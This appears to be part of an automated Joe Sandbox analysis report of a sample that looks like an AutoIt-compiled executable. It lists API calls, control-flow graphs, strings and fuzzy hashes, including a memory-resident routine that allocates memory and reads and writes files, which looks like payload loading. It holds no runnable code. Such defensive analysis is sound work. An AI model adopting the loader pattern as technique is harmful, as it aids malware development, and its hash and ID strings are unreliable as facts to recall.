                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                        • Opcode ID: 05a03a51e42841c1cd0665a3e8ae9cb0c71c7fa4468e5983488920ca7cf30ad6
                                                                                                                        • Instruction ID: f143d0c6b0c80f3b561a8e98a00846a8f3dcc9a9066f4841c4aa78f998568ed5
                                                                                                                        • Opcode Fuzzy Hash: 05a03a51e42841c1cd0665a3e8ae9cb0c71c7fa4468e5983488920ca7cf30ad6
                                                                                                                        • Instruction Fuzzy Hash: F021E3B5901258AFDB00DFA4E889BDDBFB4FB19700F00811AF551EA2A0D7B50548EFA4

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .S
                                                                                                                        • API String ID: 0-1539595904
                                                                                                                        • Opcode ID: f4084f31dbfe58e50bcc5b216dca1cda73154b838ff3e5d66c7742d360502bd2
                                                                                                                        • Instruction ID: 4df9f2ad0d55cb23b9e7b728096982678500be7613d02536fa81326fd622d9b8
                                                                                                                        • Opcode Fuzzy Hash: f4084f31dbfe58e50bcc5b216dca1cda73154b838ff3e5d66c7742d360502bd2
                                                                                                                        • Instruction Fuzzy Hash: ABC1E174D04249AFDB15DFA8D84ABEEBFB0BF59318F044099F418AB392C7709941CB61

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0055039A: CreateFileW.KERNELBASE(00000000,00000000,?,00550704,?,?,00000000,?,00550704,00000000,0000000C), ref: 005503B7
                                                                                                                        • GetLastError.KERNEL32 ref: 0055076F
                                                                                                                        • __dosmaperr.LIBCMT ref: 00550776
                                                                                                                        • GetFileType.KERNELBASE(00000000), ref: 00550782
                                                                                                                        • GetLastError.KERNEL32 ref: 0055078C
                                                                                                                        • __dosmaperr.LIBCMT ref: 00550795
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 005507B5
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 005508FF
                                                                                                                        • GetLastError.KERNEL32 ref: 00550931
                                                                                                                        • __dosmaperr.LIBCMT ref: 00550938
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                        • Opcode ID: d391549f42ad372cd4da605374c614e6c34598012bd20f1ceba67b5255ef5fab
                                                                                                                        • Instruction ID: 86c9dab704b1307408f9815d7b70e31a8ce6c6967f8c5cd898817c4fe478aa28
                                                                                                                        • Opcode Fuzzy Hash: d391549f42ad372cd4da605374c614e6c34598012bd20f1ceba67b5255ef5fab
                                                                                                                        • Instruction Fuzzy Hash: 7DA14636A101058FDF19AF68DCA5BAE3FA0FB46321F14115AFC119F2D1DB31981ADB91

Control-flow Graph

APIs
  • Part of subcall function 00513A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005E1418,?,00512E7F,?,?,?,00000000), ref: 00513A78
  • Part of subcall function 00513357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00513379
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0051356A
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0055318D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005531CE
• RegCloseKey.ADVAPI32(?), ref: 00553210
• _wcslen.LIBCMT ref: 00553277
• _wcslen.LIBCMT ref: 00553286
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 98802146-2727554177
• Opcode ID: 19c20529af85712a5106b2773150d1dd345b416f55fa79ddc1a492eeb5fed24d
• Instruction ID: 92f4a2eb1b32ecace75e30f4bbb629a098089ed271d80905e5beff44e7be68d5
• Opcode Fuzzy Hash: 19c20529af85712a5106b2773150d1dd345b416f55fa79ddc1a492eeb5fed24d
• Instruction Fuzzy Hash: 23716D714043419ED318DF65DC969ABBFE8BF99740F40082EF585871A4EB709A88DF61

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00512B8E
• LoadCursorW.USER32(00000000,00007F00), ref: 00512B9D
• LoadIconW.USER32(00000063), ref: 00512BB3
• LoadIconW.USER32(000000A4), ref: 00512BC5
• LoadIconW.USER32(000000A2), ref: 00512BD7
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00512BEF
• RegisterClassExW.USER32(?), ref: 00512C40
  • Part of subcall function 00512CD4: GetSysColorBrush.USER32(0000000F), ref: 00512D07
  • Part of subcall function 00512CD4: RegisterClassExW.USER32(00000030), ref: 00512D31
  • Part of subcall function 00512CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00512D42
  • Part of subcall function 00512CD4: InitCommonControlsEx.COMCTL32(?), ref: 00512D5F
  • Part of subcall function 00512CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00512D6F
  • Part of subcall function 00512CD4: LoadIconW.USER32(000000A9), ref: 00512D85
  • Part of subcall function 00512CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00512D94
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: c8c7ba3d9ffbf7dad13689c7b0c4d9a9b61d5d69ee38b5dec210e6b8c6c1a51e
• Instruction ID: ab420cb404ae0d20ee839d5fdab40278d11b92ac88542dcbe3edf1425b223d21
• Opcode Fuzzy Hash: c8c7ba3d9ffbf7dad13689c7b0c4d9a9b61d5d69ee38b5dec210e6b8c6c1a51e
• Instruction Fuzzy Hash: 90216A70E00358AFDB149FA5EC89AAD7FF4FB1CB50F00041AE580AA7A0D3B10548EF88

Control-flow Graph

control_flow_graph 551 513170-513185 552 5131e5-5131e7 551->552 553 513187-51318a 551->553 552->553 554 5131e9 552->554 555 5131eb 553->555 556 51318c-513193 553->556 557 5131d0-5131d8 DefWindowProcW 554->557 558 5131f1-5131f6 555->558 559 552dfb-552e23 call 5118e2 call 52e499 555->559 560 513265-51326d PostQuitMessage 556->560 561 513199-51319e 556->561 562 5131de-5131e4 557->562 564 5131f8-5131fb 558->564 565 51321d-513244 SetTimer RegisterWindowMessageW 558->565 594 552e28-552e2f 559->594 563 513219-51321b 560->563 567 5131a4-5131a8 561->567 568 552e7c-552e90 call 57bf30 561->568 563->562 573 513201-513214 KillTimer call 5130f2 call 513c50 564->573 574 552d9c-552d9f 564->574 565->563 569 513246-513251 CreatePopupMenu 565->569 570 552e68-552e72 call 57c161 567->570 571 5131ae-5131b3 567->571 568->563 587 552e96 568->587 569->563 592 552e77 570->592 577 552e4d-552e54 571->577 578 5131b9-5131be 571->578 573->563 580 552dd7-552df6 MoveWindow 574->580 581 552da1-552da5 574->581 577->557 590 552e5a-552e63 call 570ad7 577->590 585 513253-513263 call 51326f 578->585 586 5131c4-5131ca 578->586 580->563 588 552da7-552daa 581->588 589 552dc6-552dd2 SetFocus 581->589 585->563 586->557 586->594 587->557 588->586 595 552db0-552dc1 call 5118e2 588->595 589->563 590->557 592->563 594->557 599 552e35-552e48 call 5130f2 call 513837 594->599 595->563 599->557
APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0051316A,?,?), ref: 005131D8
• KillTimer.USER32(?,00000001,?,?,?,?,?,0051316A,?,?), ref: 00513204
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00513227
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0051316A,?,?), ref: 00513232
• CreatePopupMenu.USER32 ref: 00513246
• PostQuitMessage.USER32(00000000), ref: 00513267
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: 1e4f2c516c0a5113d87074a3038e763419e0f9377f5e5955fbf77d5990e95207
• Instruction ID: 2ab847bb1c256f8f2e4315ca530101497210aa3205ea15995f18b23dfea5c71b
• Opcode Fuzzy Hash: 1e4f2c516c0a5113d87074a3038e763419e0f9377f5e5955fbf77d5990e95207
• Instruction Fuzzy Hash: E7414939240644B7FB186B78DC7DBFD3E59F756340F04052AF9528A1A1CB708AC8E7A5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID:
• String ID: D%^$D%^$D%^$D%^$D%^D%^$Variable must be of type 'Object'.
• API String ID: 0-438337734
• Opcode ID: 4f7957ec933fa1cf6e29f172ad39602dfdd6db90997e4359271aa4fe9991a0ae
• Instruction ID: 323d3e8f8dbce0a03a566d9cec9c41876ebecf7366e5eac5a79410ab5342d786
• Opcode Fuzzy Hash: 4f7957ec933fa1cf6e29f172ad39602dfdd6db90997e4359271aa4fe9991a0ae
• Instruction Fuzzy Hash: B4C2BF71A00215CFEB24CF58D886AADBBB1FF59310F248969ED56AB391D370ED81CB50

Control-flow Graph

control_flow_graph 1117 171f100-171f152 call 171f000 CreateFileW 1120 171f154-171f156 1117->1120 1121 171f15b-171f168 1117->1121 1122 171f2b4-171f2b8 1120->1122 1124 171f17b-171f192 VirtualAlloc 1121->1124 1125 171f16a-171f176 1121->1125 1126 171f194-171f196 1124->1126 1127 171f19b-171f1c1 CreateFileW 1124->1127 1125->1122 1126->1122 1129 171f1c3-171f1e0 1127->1129 1130 171f1e5-171f1ff ReadFile 1127->1130 1129->1122 1131 171f201-171f21e 1130->1131 1132 171f223-171f227 1130->1132 1131->1122 1133 171f229-171f246 1132->1133 1134 171f248-171f25f WriteFile 1132->1134 1133->1122 1136 171f261-171f288 1134->1136 1137 171f28a-171f2af CloseHandle VirtualFree 1134->1137 1136->1122 1137->1122
APIs
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0171F145
Memory Dump Source
• Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction ID: 2433d424e3b5dd7d770bbc2457236b6976424147a3d950de638d8c353a1272dd
• Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction Fuzzy Hash: 3A51EA75A50208FBEF20DFA8CC89FDEB778AF4C701F108554FA0AEA184DA749645DB60

Control-flow Graph

control_flow_graph 1157 512c63-512cd3 CreateWindowExW * 2 ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00512C91
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00512CB2
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00511CAD,?), ref: 00512CC6
• ShowWindow.USER32(00000000,?,?,?,?,?,?,00511CAD,?), ref: 00512CCF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 89165a7c98567d1cc41c631086db311e900b2983ca30c5ee3e8e3083fefe8e11
• Instruction ID: b78191da6a19a4070b5bd1660b6506e9f4f27e897899a2873503c4c8845f81f5
• Opcode Fuzzy Hash: 89165a7c98567d1cc41c631086db311e900b2983ca30c5ee3e8e3083fefe8e11
• Instruction Fuzzy Hash: 1FF03A755402D07EEB300713AC88E773EBDE7EBF50B00045EF940AA5A0C6711848EAB8

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1272 582947-5829b9 call 551f50 call 5825d6 call 52fe0b call 515722 call 58274e call 51511f call 535232 1287 582a6c-582a73 call 582e66 1272->1287 1288 5829bf-5829c6 call 582e66 1272->1288 1293 582a7c 1287->1293 1294 582a75-582a77 1287->1294 1288->1294 1295 5829cc-582a6a call 53d583 call 534983 call 539038 call 53d583 call 539038 * 2 1288->1295 1298 582a7f-582b3a call 5150f5 * 8 call 583017 call 53e5eb 1293->1298 1296 582cb6-582cb7 1294->1296 1295->1298 1300 582cd5-582cdb 1296->1300 1337 582b3c-582b3e 1298->1337 1338 582b43-582b5e call 582792 1298->1338 1304 582cdd-582ced call 52fdcd call 52fe14 1300->1304 1305 582cf0-582cf6 1300->1305 1304->1305 1337->1296 1341 582bf0-582bfc call 53e678 1338->1341 1342 582b64-582b6c 1338->1342 1349 582bfe-582c0d DeleteFileW 1341->1349 1350 582c12-582c16 1341->1350 1343 582b6e-582b72 1342->1343 1344 582b74 1342->1344 1346 582b79-582b97 call 5150f5 1343->1346 1344->1346 1356 582b99-582b9e 1346->1356 1357 582bc1-582bd7 call 58211d call 53dbb3 1346->1357 1349->1296 1352 582c18-582c7e call 5825d6 call 53d2eb * 2 call 5822ce 1350->1352 1353 582c91-582ca5 CopyFileW 1350->1353 1354 582cb9-582ccf DeleteFileW call 582fd8 1352->1354 1377 582c80-582c8f DeleteFileW 1352->1377 1353->1354 1355 582ca7-582cb4 DeleteFileW 1353->1355 1366 582cd4 1354->1366 1355->1296 1362 582ba1-582bb4 call 5828d2 1356->1362 1372 582bdc-582be7 1357->1372 1370 582bb6-582bbf 1362->1370 1366->1300 1370->1357 1372->1342 1374 582bed 1372->1374 1374->1341 1377->1296
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582C05
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00582C87
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00582C9D
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582CAE
                                                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00582CC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Delete$Copy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3226157194-0
                                                                                                                        • Opcode ID: c077e8587aab84dc25c6d4aade040a46dbf7704a9f101c54c76f81e2667bb1c5
                                                                                                                        • Instruction ID: d8a466fde6715d192c1b25391eab9c62b1a2b36353e92d2b34031b6139532f0e
                                                                                                                        • Opcode Fuzzy Hash: c077e8587aab84dc25c6d4aade040a46dbf7704a9f101c54c76f81e2667bb1c5
                                                                                                                        • Instruction Fuzzy Hash: 99B1417190111AABDF15EBA4CC89EEE7FBDFF89350F1040A6F909F6141EA319A448F61

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1378 545aa9-545ace 1379 545ad7-545ad9 1378->1379 1380 545ad0-545ad2 1378->1380 1382 545afa-545b1f 1379->1382 1383 545adb-545af5 call 53f2c6 call 53f2d9 call 5427ec 1379->1383 1381 545ca5-545cb4 call 530a8c 1380->1381 1385 545b26-545b2c 1382->1385 1386 545b21-545b24 1382->1386 1383->1381 1391 545b2e-545b46 call 53f2c6 call 53f2d9 call 5427ec 1385->1391 1392 545b4b 1385->1392 1386->1385 1390 545b4e-545b53 1386->1390 1395 545b64-545b6d call 54564e 1390->1395 1396 545b55-545b61 call 549424 1390->1396 1426 545c9c-545c9f 1391->1426 1392->1390 1407 545b6f-545b71 1395->1407 1408 545ba8-545bba 1395->1408 1396->1395 1412 545b95-545b9e call 54542e 1407->1412 1413 545b73-545b78 1407->1413 1410 545c02-545c23 WriteFile 1408->1410 1411 545bbc-545bc2 1408->1411 1417 545c25-545c2b GetLastError 1410->1417 1418 545c2e 1410->1418 1420 545bc4-545bc7 1411->1420 1421 545bf2-545c00 call 5456c4 1411->1421 1427 545ba3-545ba6 1412->1427 1414 545c6c-545c7e 1413->1414 1415 545b7e-545b8b call 5455e1 1413->1415 1424 545c80-545c83 1414->1424 1425 545c89-545c99 call 53f2d9 call 53f2c6 1414->1425 1435 545b8e-545b90 1415->1435 1417->1418 1428 545c31-545c3c 1418->1428 1429 545be2-545bf0 call 545891 1420->1429 1430 545bc9-545bcc 1420->1430 1421->1427 1424->1425 1433 545c85-545c87 1424->1433 1425->1426 1439 545ca4 1426->1439 1427->1435 1436 545ca1 1428->1436 1437 545c3e-545c43 1428->1437 1429->1427 1430->1414 1438 545bd2-545be0 call 5457a3 1430->1438 1433->1439 1435->1428 1436->1439 1443 545c45-545c4a 1437->1443 1444 545c69 1437->1444 1438->1427 1439->1381 1447 545c60-545c67 call 53f2a3 1443->1447 1448 545c4c-545c5e call 53f2d9 call 53f2c6 1443->1448 1444->1414 1447->1426 1448->1426
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: JOQ
                                                                                                                        • API String ID: 0-3921798060
                                                                                                                        • Opcode ID: 406b47cefafd532f179173fe4036eb942f9cb2223270f1b6d72f8732076f18dd
                                                                                                                        • Instruction ID: 6a2e05dfffb8997bfcb0bbf0ecc67ba69fdb86b8c7cd3d9f2bc7bf9880926ced
                                                                                                                        • Opcode Fuzzy Hash: 406b47cefafd532f179173fe4036eb942f9cb2223270f1b6d72f8732076f18dd
                                                                                                                        • Instruction Fuzzy Hash: CE51BE75D0060A9BCB259FA4CC89FEEBFB8FF45318F14045AF405A7292E6319D01DB61

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1457 1720c00-1720d44 call 171e7e0 call 1720af0 CreateFileW 1464 1720d46 1457->1464 1465 1720d4b-1720d5b 1457->1465 1466 1720e18-1720e1d 1464->1466 1468 1720d62-1720d7c VirtualAlloc 1465->1468 1469 1720d5d 1465->1469 1470 1720d83-1720d9a ReadFile 1468->1470 1471 1720d7e 1468->1471 1469->1466 1472 1720d9e-1720db3 call 171f850 1470->1472 1473 1720d9c 1470->1473 1471->1466 1475 1720db8-1720df2 call 1720b30 call 171faf0 1472->1475 1473->1466 1480 1720df4-1720e09 call 1720b80 1475->1480 1481 1720e0e-1720e16 1475->1481 1480->1481 1481->1466
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 01720AF0: Sleep.KERNELBASE(000001F4), ref: 01720B01
                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01720D3A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1370595821.000000000171E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0171E000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_171e000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFileSleep
                                                                                                                        • String ID: ASLZDWNV112XA880LIC3
                                                                                                                        • API String ID: 2694422964-2396587938
                                                                                                                        • Opcode ID: dc1ff63ad4645557462787b299d53a89de36b7ef98bd21dbf2c6f37b9c6b7e6a
                                                                                                                        • Instruction ID: 78f4ba92aa6bc2a2851150453de98e0d032fda6e0cff1b11bcfb4e7ba03eece8
                                                                                                                        • Opcode Fuzzy Hash: dc1ff63ad4645557462787b299d53a89de36b7ef98bd21dbf2c6f37b9c6b7e6a
                                                                                                                        • Instruction Fuzzy Hash: B5619431D04258DBEF11DBB4C854BEEFB75AF18300F004199E649BB2C1D6B91B85CBA5
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B40
                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B61
                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00513B0F,SwapMouseButtons,00000004,?), ref: 00513B83
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                        • Opcode ID: 319631d09ed959d626de6772052e70475460ae4af12e77f925a05db88f3ffe56
                                                                                                                        • Instruction ID: 09d53879e9682ef28836425b54e2f20288d6eab53c977c5ae174cfe8191ab0fe
                                                                                                                        • Opcode Fuzzy Hash: 319631d09ed959d626de6772052e70475460ae4af12e77f925a05db88f3ffe56
                                                                                                                        • Instruction Fuzzy Hash: 35112AB5514208FFEB208FA5DC58AEFBBB8FF05744B104859A805D7110E2319E84A760
                                                                                                                        APIs
                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00552C8C
                                                                                                                          • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                                                                                          • Part of subcall function 00512DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00512DC4
                                                                                                                        Strings
